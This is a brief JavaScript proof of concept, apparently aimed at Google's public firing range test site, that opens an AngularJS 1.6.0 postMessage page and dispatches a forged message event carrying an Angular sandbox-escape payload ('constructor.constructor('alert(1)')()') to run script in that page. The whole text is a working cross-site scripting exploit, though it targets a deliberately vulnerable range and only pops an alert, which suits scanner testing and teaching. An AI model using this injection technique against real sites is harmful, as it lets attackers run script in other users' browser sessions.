function sleep(ms) {return new Promise(resolve => setTimeout(resolve, ms));}async function demo() { var x = window.open("https://public-firing-range.appspot.com/angular/angular_post_message_parse/1.6.0");  var e = new Event('message');  e.data = 'constructor.constructor(\'alert(1)\')()';  await sleep(2000);  x.dispatchEvent(e);} demo();